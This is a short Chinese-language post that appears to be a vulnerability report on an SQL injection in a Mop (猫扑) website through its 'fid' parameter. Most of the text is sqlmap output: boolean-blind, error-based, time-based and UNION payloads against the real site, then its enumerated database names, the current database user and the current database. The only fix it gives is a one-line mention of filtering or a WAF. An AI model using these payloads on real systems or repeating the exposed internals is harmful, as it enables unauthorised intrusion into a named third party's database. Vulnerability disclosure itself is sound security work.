猫扑某站存在 SQL注入漏洞

      猫扑某站存在 SQL注入漏洞无评论

  猫扑某站SQL注入漏洞存在的注入参数find

  Parameter: fid (GET)

  Type: boolean-based blind

  Title: AND boolean-based blind – WHERE or HAVING clause

  Payload: fid=47 AND 1872=1872&aid=908

  Type: error-based

  Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause

  Payload: fid=47 AND (SELECT 7959 FROM(SELECT COUNT(*),CONCAT(0x71766b6a71,(SELECT (ELT(7959=7959,1))),0x7162786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&aid=908

  Type: AND/OR time-based blind

  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

  Payload: fid=47 AND (SELECT * FROM (SELECT(SLEEP(5)))anib)&aid=908

  Type: UNION query

  Title: MySQL UNION query (NULL) – 52 columns

  Payload: fid=47 UNION ALL SELECT NULL,CONCAT(0x71766b6a71,0x557a59596d4d7661656e,0x7162786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&aid=908

  —

  [14:38:10] [INFO] the back-end DBMS is MySQL

  back-end DBMS: MySQL 5.0

  库

  available databases [14]:

  [*] information_schema

  [*] mop_demo

  [*] mop_entertainment

  [*] mop_entertainment1

  [*] mop_health

  [*] mop_health1

  [*] mop_lady

  [*] mop_lady1

  [*] mop_local

  [*] mop_news

  [*] mop_society

  [*] mop_society1

  [*] mysql

  [*] performance_schema

  用户信息

  back-end DBMS: MySQL 5.0

  [14:36:46] [INFO] fetching current user

  current user: ‘liudutianxia@%’

  [14:36:47] [INFO] fetching current database

  current database: ‘mop_lady1’

  不好传图片

  修复方案

  过滤waf

发表评论